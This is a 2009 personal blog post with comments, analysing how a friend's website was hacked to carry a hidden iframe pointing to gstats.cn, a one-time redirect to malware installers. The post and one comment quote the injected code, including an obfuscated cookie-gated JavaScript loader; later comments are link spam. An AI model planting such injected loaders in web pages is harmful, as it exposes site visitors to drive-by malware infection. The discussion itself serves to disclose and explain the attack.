dtm: (Default)
[personal profile] dtm
Yeah, yeah. First post in a long time, first post of the new year, first post with a new US President, etc. Assume I've groveled sufficiently for not posting in ages.

So the other day I visited a website belonging to a friend and my web-browser completely freaked out, blocking the site and saying that it linked to all sorts of disreputable places. That is to say, it warned that my friend's site was including material from sites that attempted to install all sorts of malware.

Now, this was odd, but occasionally a bad ad can get into an ad network, and then everyone showing those ads accidentally is displaying malware, and I figured that was what happened since when I went back and then visited the site again, all was fine.

Only, after reloading her page I discovered that my friend doesn't run ads on her site.


Instead what I discovered after looking at the source was that someone had hacked her site and inserted
<iframe src=http://gstats.cn style=display:none></iframe>
into the source. That is, inserted an invisible (display:none) frame that included the contents of http://gstats.cn.

A little bit of poking revealed that gstats.cn is a very interesting site: the first time a given IP address visits that site, they're redirected to a site that attempts to install malware. On second and subsequent visits, that site pretends that nothing's there (and incidentally, probably violates Google's trademark while doing so).

Why would anyone do this?

Imagine for a moment that you're the kind of person who breaks into other's websites to spread malware. You're probably doing this because someone is paying you to send spam through infected machines under your command, or to steal personal information off the end users' machines. As long as the website you defaced to insert a reference to your domain keeps that reference in there, you get to infect more and more people. So one of your goals is to prevent the owners of the website from realizing that something's wrong, and fixing it.

For people like that, it must be a real pain that not every web visitor is infectable. Many people will have anti-virus software or paranoid web-browsers that'll pop up errors if you try to infect them. Having errors pop up is bad if you want to go undetected.

So what you do is compromise: you'll attempt once to infect each visitor. After that, you'll show something harmless. The idea is that people running vulnerable systems will be infected the first time - so there's no point in infecting them again - and people running systems that will pop up errors when you try to infect them will pop the errors up once, but then never again.

After all, everyone is trained in the idea that the web has minor, one-time glitches all the time. So some error popped up when you visited a site once. Who's going to look too deeply if the error never re-occurs?

Very sneaky. It appears that gstats.cn is just the most recent such one-time redirect site for this batch of criminals; hostads.cn was an earlier site of theirs that appears to have operated along the same principles.

Date: 2009-01-21 05:02 pm (UTC)
From: [identity profile] astrogeek01.livejournal.com
Does that "preview" feature that a lot of browsers/web pages do now cause enough loading of the page to run that little script?

gstats code getting sneakier

Date: 2009-03-08 02:35 pm (UTC)
From: (Anonymous)
I just found a client's site hacked, and the redirect code inserted inside the 2-line Google page tracking script on the page, like this:

var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("
[Error: Irreparable invalid markup ('<ifra"+"me>') in entry. Owner must fix manually. Raw contents below.]

I just found a client's site hacked, and the redirect code inserted inside the 2-line Google page tracking script on the page, like this:

var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("<ifra"+"me src"+"="+"h"+"ttp:"+"/"+"/g"+"stats.cn"+" "+"style"+"=disp"+"lay:none></if"+"r"+"ame>");
document.cookie = "dfq=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
pageTracker._trackPageview();

Re: gstats code getting sneakier

Date: 2009-03-11 01:23 pm (UTC)
ext_58972: Mad! (Default)
From: [identity profile] autopope.livejournal.com
As a point of note, "cn" as a word suffix (regexp search: cn$) doesn't appear at all in /usr/share/dict/words on this here unix system.

So some sort of check for /cn["\/]*/ or something like that ought to weed out everything in the .cn TLD.

This isn't much use if you want to link to legitimate Chinese sites, but realistically it ought to be a hot-button for auto-moderation of blog comments and similar.

Re: gstats code getting sneakier

Date: 2009-06-14 11:44 pm (UTC)
From: (Anonymous)
How to prevent this from happening??

Date: 2012-01-29 01:51 am (UTC)
From: [identity profile] dearrerewa.livejournal.com
Ура!, тот кто писал ништяк написал!Image (http://zimnyayaobuv.ru/)Image (http://zimnyaya-obuv.ru/)

Date: 2012-02-16 02:20 pm (UTC)
From: [identity profile] ximenezehu.livejournal.com
Интересно читатьImage (http://zimnyayaobuv.ru/)Image (http://zimnyaya-obuv.ru/)

Date: 2012-07-08 05:22 pm (UTC)
From: [identity profile] samarqandr.livejournal.com

http://www.youtube.com/watch?v=c6M_6qOz-yw

May 2017

S M T W T F S
 123456
78910111213
14151617181920
212223242526 27
28293031   

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Jul. 24th, 2017 12:50 pm
Powered by Dreamwidth Studios